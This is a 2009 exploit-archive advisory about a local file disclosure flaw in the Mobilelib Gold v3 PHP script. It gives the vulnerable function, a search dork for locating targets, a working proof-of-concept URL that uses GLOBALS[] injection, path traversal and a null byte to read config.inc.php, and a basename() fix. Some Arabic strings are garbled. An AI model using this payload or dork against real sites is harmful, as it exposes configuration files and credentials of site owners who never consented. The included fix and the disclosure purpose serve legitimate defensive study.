[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Mobilelib Gold v3 Local File Disclosure Vulnerability
# Published : 2009-07-14
# Author : Qabandi
# Previous Title : DJ Calendar (DJcalendar.cgi TEMPLATE) File Disclosure Vuln
# Next Title : Traidnt UP 2.0 Remote Blind SQL Injection Exploit
|| || | ||
o_,_7 _|| . _o_7 _|| q_|_|| o_\_,
( : / (_) / ( .
___________________
_/QQQQQQQQQQQQQQQQQQQ__
__/QQQ/````````````````QQQ___
_/QQQQQ/ QQQQQQ
/QQQQ/`` ```QQQQ
/QQQQ/ QQQQ
|QQQQ/ By Qabandi QQQQ|
|QQQQ| |QQQQ|
|QQQQ| From Kuwait, PEACE... |QQQQ|
|QQQQ| |QQQQ|
|QQQQ iqa[a]hotmail.fr /QQQQ|
QQQQ __ /QQQQ/
QQQQ /QQ_QQQQ/
QQQQ QQQQQQQ/
QQQQQ /QQQQQ/_
``QQQQQ_____________/QQQ/QQQQ_
``QQQQQQQQQQQQQQQQQQQ/ `QQQQ
``````````````````` `````
=Vuln: Mobilelib Gold v3 Local File Disclosure Vulnerability
=INFO: http://www.ac4p.com/
=BUY: http://www.ac4p.com/
=Download: ~~~
=DORK: intext:"English for dummies"
____________
_-=/:Conditions:=-_
````````````````````````````````````````````````````````````````````````````````
Magic_quotes MUST BE ON :)
---------------------------------------===--------------------------------------
_________________
_-=/:Vulnerable_Code:=-_
````````````````````````````````````````````````````````````````````````````````
// in "./myhtml.php"
function getthememyhtml($page)
{
if (file_exists("./myhtmlpages/".$page.".html")) {
$templat="./myhtmlpages/".$page.".html";
$tempindex=@fopen($templat,"r");
$html=@fread($tempindex,@filesize($templat));
@fclose($tempindex);
} else {
$html ="<p align="center"> ???£ ?-?“?????? ?…?-?????? ?£???? ????????????.</p>";
}
return $html;
}
---------------------------------------===--------------------------------------
_______
_-=/:P.o.C:=-_
````````````````````````````````````````````````````````````````````````````````
We will bypass the security, where it takes all _GET variables and scans if
they contain harmful tags such as the null char (%00) ..etc
We will bypass it by using an old GLOBALS[] trick ;)
http://localhost/goldv3/myhtml.php?GLOBALS[page]=../config.inc.php%00
---------------------------------------===--------------------------------------
__________
_-=/:SOLUTION:=-_
````````````````````````````````````````````````````````````````````````````````
// in "./myhtml.php"
function getthememyhtml($page)
{
$page = basename($page); //<---- Added the good old Basename func ;)
if (file_exists("./myhtmlpages/".$page.".html")) {
$templat="./myhtmlpages/".$page.".html";
$tempindex=@fopen($templat,"r");
$html=@fread($tempindex,@filesize($templat));
@fclose($tempindex);
} else {
$html ="<p align="center"> ???£ ?-?“?????? ?…?-?????? ?£???? ????????????.</p>";
}
return $html;
}
---------------------------------------===--------------------------------------
______________________________________________________________________________
/
| Sec-Code.com ;) Shru7at Iktshaf al-thaghrat Qareeban!!il7ag sajjil!! |
______________________________________________________________________________/
No More Private /
`````````````````
Salamz to All Muslim Hackers.
# www.Syue.com [2009-07-14]